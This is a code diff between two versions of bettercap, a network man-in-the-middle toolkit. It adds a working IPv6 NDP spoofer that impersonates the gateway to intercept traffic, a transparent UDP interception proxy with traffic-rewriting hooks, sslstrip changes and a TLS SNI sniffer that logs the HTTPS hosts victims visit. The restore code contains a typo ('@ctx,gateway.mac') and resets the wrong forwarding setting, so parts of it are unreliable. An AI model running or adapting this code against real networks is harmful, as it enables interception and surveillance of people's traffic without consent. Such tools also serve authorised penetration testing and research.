bettercap 1.6.0 → 1.6.1

data/lib/bettercap/proxy/http/sslstrip/strip.rb

@@ -53,17 +53,11 @@ class StrippedObject
   # Return a normalized version of +url+.
   def self.normalize( url, schema = 'https' )
     has_schema = url.include?('://')
-    # add schema if needed
-    if has_schema
-      has_slash = ( url =~ /^.+:\/\/.+\/.*$/ )
-    else
-      has_slash = ( url =~ /^.+\/.*$/ )
+
+    # add schema if none
+    unless has_schema
       url = "#{schema}://#{url}"
     end
-    # add slash if needed
-    unless has_slash
-      url = "#{url}/"
-    end
     url
   end
 

data/lib/bettercap/proxy/http/streamer.rb

@@ -114,7 +114,7 @@ class Streamer
             r = mod.on_pre_request request
             # the handler returned a response, do not execute
             # the request
-            response = r unless r.nil?
+            response = r if r.instance_of?(BetterCap::Proxy::HTTP::Response)
           else
             mod.on_request request, response
           end

data/lib/bettercap/proxy/udp/module.rb

@@ -0,0 +1,85 @@
+# encoding: UTF-8
+=begin
+
+BETTERCAP
+
+Author : Simone 'evilsocket' Margaritelli
+Email  : evilsocket@gmail.com
+Blog   : https://www.evilsocket.net/
+
+This project is released under the GPL 3 license.
+
+=end
+
+module BetterCap
+module Proxy
+module UDP
+
+# Base class for transparent UDP proxy modules, example:
+#
+#  class SampleModule < BetterCap::Proxy::UDP::Module
+#    def on_data( event )
+#      event.data = 'aaa'
+#    end
+#
+#    def on_response( event )
+#      event.data = 'aaa'
+#    end
+#  end
+class Module < BetterCap::Pluggable
+  def on_options( opts ); end
+  def check_opts; end
+  # This callback is called when the target is sending data to the upstream server.
+  # +event+ is an instance of the BetterCap::Proxy::UDP::Event class.
+  def on_data( event ); end
+  # This callback is called when the upstream server is sending data to the target.
+  # +event+ is an instance of the BetterCap::Proxy::UDP::Event class.
+  def on_response( event ); end
+
+  # Loaded modules.
+  @@loaded = {}
+
+  class << self
+    # Register custom options for each available module.
+    def register_options(opts)
+      @@loaded.each do |name,mod|
+        if mod.respond_to?(:on_options)
+          mod.on_options(opts)
+        end
+      end
+    end
+
+    # Called when a class inherits this base class.
+    def inherited(subclass)
+      name = subclass.name.upcase
+      @@loaded[name] = subclass
+    end
+
+    # Load +file+ as a proxy module.
+    def load( file, opts )
+      begin
+        require file
+      rescue LoadError => e
+        raise BetterCap::Error, "Invalid UDP proxy module specified: #{e.message}"
+      end
+
+      @@loaded.each do |name,mod|
+        @@loaded[name] = mod.new
+      end
+
+      self.register_options(opts)
+    end
+
+    # Execute method +even_name+ for each loaded module instance using +event+
+    # as its argument.
+    def dispatch( event_name, event )
+      @@loaded.each do |name,mod|
+        mod.send( event_name, event )
+      end
+    end
+  end
+end
+
+end
+end
+end

data/lib/bettercap/proxy/udp/pool.rb

@@ -0,0 +1,86 @@
+# encoding: UTF-8
+=begin
+
+BETTERCAP
+
+Author : Simone 'evilsocket' Margaritelli
+Email  : evilsocket@gmail.com
+Blog   : https://www.evilsocket.net/
+
+This project is released under the GPL 3 license.
+
+=end
+
+module BetterCap
+module Proxy
+module UDP
+
+class Client < EM::Connection
+  attr_accessor :client_ip, :client_port
+
+  def initialize(client_ip, client_port, server)
+    @client_ip, @client_port = client_ip, client_port
+    @server = server
+  end
+
+  # upstream -> ip
+  def receive_data(data)
+    port, ip = Socket.unpack_sockaddr_in(get_peername)
+    event    = Event.new( ip, port, data )
+
+    Logger.info "[#{'UDP PROXY'.green}] #{'upstream'.yellow}:#{@server.relay_port} #{'->'.green} #{ip} ( #{event.data.bytesize} bytes )"
+
+    Module.dispatch( 'on_response', event )
+
+    @server.send_datagram( event.data, client_ip, client_port )
+  end
+end
+
+class Server < EM::Connection
+  attr_accessor :relay_ip, :relay_port
+
+  def initialize(address, relay_ip, relay_port)
+    @relay_ip, @relay_port = relay_ip, relay_port
+    @pool = Pool.new(self, address)
+  end
+
+  # ip -> upstream
+  def receive_data(data)
+    port, ip = Socket.unpack_sockaddr_in(get_peername)
+    client = @pool.client(ip, port)
+    event = Event.new( ip, port, data )
+
+    Logger.info "[#{'UDP PROXY'.green}] #{ip} #{'->'.green} #{'upstream'.yellow}:#{@relay_port} ( #{event.data.bytesize} bytes )"
+
+    Module.dispatch( 'on_data', event )
+
+    client.send_datagram( event.data, @relay_ip, @relay_port )
+  end
+end
+
+class Pool
+  def initialize(server, address)
+    @address = address
+    @clients = {}
+    @server = server
+  end
+
+  def client(ip, port)
+    @clients[key(ip, port)] || @clients[key(ip,port)] = create_client(ip, port)
+  end
+
+  private
+
+  def key(ip, port)
+    "#{ip}:#{port}"
+  end
+
+  def create_client(ip, port)
+    Logger.debug "#{'UDP'.green} Creating new client for #{ip}:#{port}" 
+    client = EM::open_datagram_socket @address, 0, Client, ip, port, @server
+  end
+end
+
+end
+end
+end

data/lib/bettercap/proxy/udp/proxy.rb

@@ -0,0 +1,92 @@
+# encoding: UTF-8
+=begin
+
+BETTERCAP
+
+Author : Simone 'evilsocket' Margaritelli
+Email  : evilsocket@gmail.com
+Blog   : https://www.evilsocket.net/
+
+This project is released under the GPL 3 license.
+
+=end
+
+module BetterCap
+module Proxy
+module UDP
+
+
+# Class used to encapsulate ( and keep references ) of a single UDP event-.
+# https://stackoverflow.com/questions/161510/pass-parameter-by-reference-in-ruby
+class Event
+  # The source IP address of this event.
+  attr_accessor :ip
+  # Source port.
+  attr_accessor :port
+  # Reference to the buffer being transmitted.
+  attr_accessor :data
+
+  def initialize( ip, port, data = nil )
+    @ip   = ip
+    @port = port
+    @data = data
+  end
+end
+
+# Transparent UDP proxy class.
+class Proxy
+  # Initialize the UDP proxy with given arguments.
+  def initialize( address, port, up_address, up_port )
+    @address          = address
+    @port             = port
+    @upstream_address = up_address
+    @upstream_port    = up_port
+    @ctx              = BetterCap::Context.get
+    @worker           = nil
+  end
+
+  # Start the proxy.
+  def start
+    @worker = Thread.new &method(:worker)
+    # If the upstream server is in this network, we need to make sure that its MAC
+    # address is discovered and put in the ARP cache before we even start the proxy,
+    # otherwise internal connections won't be spoofed and the proxy will be useless
+    # until some random event will fill the ARP cache for the server.
+    if @ctx.iface.network.include?( @upstream_address )
+      Logger.debug "[#{'UDP PROXY'.green}] Sending probe to upstream server address ..."
+      BetterCap::Network.get_hw_address( @ctx, @upstream_address )
+      # wait for the system to acknowledge the ARP cache changes.
+      sleep( 1 )
+    end
+  end
+
+  # Stop the proxy.
+  def stop
+    Logger.info "Stopping UDP proxy ..."
+    EventMachine.stop
+    @worker.join
+  end
+
+  private
+
+  def worker
+    begin
+      up_addr = @upstream_address
+      up_port = @upstream_port
+      up_svc  = BetterCap::StreamLogger.service( :udp, @upstream_port )
+
+      EM::run do
+        Logger.info "[#{'UDP PROXY'.green}] Starting on #{@address}:#{@port} ( -> #{up_addr}:#{up_port} ) ..."
+        EM::open_datagram_socket @address, @port, Server, @address, up_addr, up_port
+      end
+
+    rescue Exception => e
+      Logger.error e.message
+      Logger.exception e
+    end
+  end
+end
+
+end
+end
+end

data/lib/bettercap/shell.rb

@@ -70,13 +70,19 @@ module Shell
 
     # Get the +iface+ network interface configuration ( using iproute2 ).
     def ip(iface = '')
-      self.execute( "LANG=en && ip addr show #{iface}" )
+      self.execute( "LANG=en && LANGUAGE=en_EN.UTF-8 && ip addr show #{iface}" )
     end
 
     # Get the ARP table cached on this computer.
     def arp
-      self.execute( 'LANG=en && arp -a -n' )
+      self.execute( 'LANG=en && LANGUAGE=en_EN.UTF-8 && arp -a -n' )
     end
+
+    # Get the NDP table cached on this computer.
+    def ndp
+      self.execute( 'LANG=en && LANGUAGE=en_EN.UTF-8 && ip -6 neighbor show')
+    end
+
   end
 end
 end

data/lib/bettercap/sniffer/parsers/https.rb

@@ -16,17 +16,26 @@ module Parsers
 # HTTPS connections parser.
 class Https < Base
   @@prev = nil
+  @@lock = Mutex.new
 
   def on_packet( pkt )
     begin
-      if pkt.respond_to?(:tcp_dst) and pkt.tcp_dst == 443
-        Thread.new do
-          hostname = BetterCap::Network.ip2name( pkt.ip_daddr )
+      # poor man's TLS Client Hello with SNI extension parser :P
+      if pkt.respond_to?(:tcp_dst) and \
+         pkt.payload[0] == "\x16" and \
+         pkt.payload[1] == "\x03" and \
+         pkt.payload =~ /\x00\x00.{4}\x00.{2}([a-z0-9]+([\-\.]{1}[a-z0-9]+)*\.[a-z]{2,6})\x00/
+        hostname = $1
+        if pkt.tcp_dst != 443
+          hostname += ":#{pkt.tcp_dst}"
+        end
+
+        @@lock.synchronize {
           if @@prev.nil? or @@prev != hostname
             StreamLogger.log_raw( pkt, 'HTTPS', "https://#{hostname}/" )
             @@prev = hostname
           end
-        end
+        }
       end
     rescue; end
   end

data/lib/bettercap/spoofers/ndp.rb

@@ -0,0 +1,144 @@
+# encoding: UTF-8
+
+module BetterCap
+module Spoofers
+# This class is responsible of performing NDP spoofing on the network.
+class Ndp < Base
+  # Initialize the BetterCap::Spoofers::NDP object.
+  def initialize
+    @ctx          = Context.get
+    @forwarding   = @ctx.firewall.ipv6_forwarding_enabled?
+    @spoof_thread = nil
+    @sniff_thread = nil
+    @capture      = nil
+    @running      = false
+
+    update_gateway!
+  end
+
+  # Send a spoofed NDP reply to the target identified by the +daddr+ IP address
+  # and +dmac+ MAC address, spoofing the +saddr+ IP address and +smac+ MAC
+  # address as the source device.
+  def send_spoofed_packet( saddr, smac, daddr, dmac )
+    pkt = PacketFu::NDPPacket.new
+    pkt.eth_saddr = smac
+    pkt.eth_daddr = dmac
+    pkt.eth_proto = 0x86dd
+
+    pkt.ipv6_saddr = saddr
+    pkt.ipv6_daddr = daddr
+    pkt.ipv6_recalc
+
+    if @ctx.gateway.ip == daddr
+      pkt.ndp_set_flags = "001"
+    else
+      pkt.ndp_set_flags = "111"
+    end
+
+    pkt.ndp_type = 136
+    pkt.ndp_taddr = saddr
+    pkt.ndp_opt_type = 2
+    pkt.ndp_opt_len = 1
+    pkt.ndp_lladdr = smac
+
+    pkt.ndp_recalc
+
+    @ctx.packets.push(pkt)
+  end
+
+  # Start the NDP spoofing.  
+  def start
+    Logger.debug "Starting NDP spoofer ( #{@ctx.options.spoof.half_duplex ? 'Half' : 'Full'} Duplex ) ..."
+
+    stop() if @running
+    @running = true
+
+    if @ctx.options.spoof.kill
+      Logger.warn "Disabling packet forwarding."
+      @ctx.firewall.enable_ipv6_forwarding(false) if @forwarding
+    else
+      @ctx.firewall.enable_ipv6_forwarding(true) unless @forwarding
+    end
+
+    @sniff_thread = Thread.new { ndp_watcher }
+    @spoof_thread = Thread.new { ndp_spoofer }
+  end
+
+  # Stop the NDP spoofing, reset firewall state and restore targets IPv6 table.
+  def stop
+    raise 'NDP spoofer is not running' unless @running
+
+    Logger.debug 'Stopping NDP spoofer ...'
+
+    @running = false
+    begin
+      @spoof_thread.exit
+    rescue
+    end
+
+    Logger.debug "Restoring IPv6 table of #{@ctx.targets.size} targets ..."
+
+    @ctx.targets.each do |target|
+      if target.spoofable?
+        5.times do
+          spoof(target, true)
+          sleep 0.3
+        end
+      end
+    end
+
+    Logger.debug "Resetting packet forwarding to #{@forwarding} ..."
+
+    @ctx.firewall.enable_forwarding( @forwarding )
+  end
+
+  private
+
+  # Send an NDP spoofing packet to +target+, if +restore+ is true it will
+  # restore its IPv6 cache instead.
+  def spoof( target, restore = false )
+    if restore
+      send_spoofed_packet( @ctx.gateway.ip, @ctx.gateway.mac, target.ip, target.mac )
+      send_spoofed_packet( target.ip, target.mac, @ctx.gateway.ip, @ctx,gateway.mac ) unless @ctx.options.spoof.half_duplex
+    else
+      # tell the target we're the gateway
+      send_spoofed_packet( @ctx.gateway.ip, @ctx.iface.mac, target.ip, target.mac )
+      # tell the gateway we're the target
+      send_spoofed_packet( target.ip, @ctx.iface.mac, @ctx.gateway.ip, @ctx.gateway.mac ) unless @ctx.options.spoof.half_duplex
+    end
+  end
+
+  # Main spoofer loop.
+  def ndp_spoofer
+    spoof_loop(1) { |target|
+      if target.spoofable?
+        spoof(target)
+      end
+    }
+  end
+
+  # Return true if the +pkt+ packet is an NDP 'who-has' query coming
+  # from some network endpoint.
+  def is_ndp_query?(pkt)
+    begin
+      # we're only interested in 'who-has' packets
+      return ( pkt.ndp_type == 135 and \
+               pkt.ipv6_saddr.to_s != @ctx.iface.ip )
+    rescue; end
+    false
+  end
+
+  # Will watch for incoming Neighbor Solicitation messages and spoof the source address.
+  def ndp_watcher
+    Logger.debug 'NDP watcher started ...'
+
+    sniff_packets('icmp6') { |pkt|
+      if is_ndp_query?(pkt)
+        Logger.info "[#{'NDP'.green}] #{pkt.ipv6_saddr.to_s} is asking who #{pkt.ipv6_daddr.to_s} is."
+        send_spoofed_packet pkt.ipv6_daddr.to_s, @ctx.iface.mac, pkt.ipv6_saddr.to_s, pkt.eth_saddr
+      end
+    }
+  end
+end
+end
+end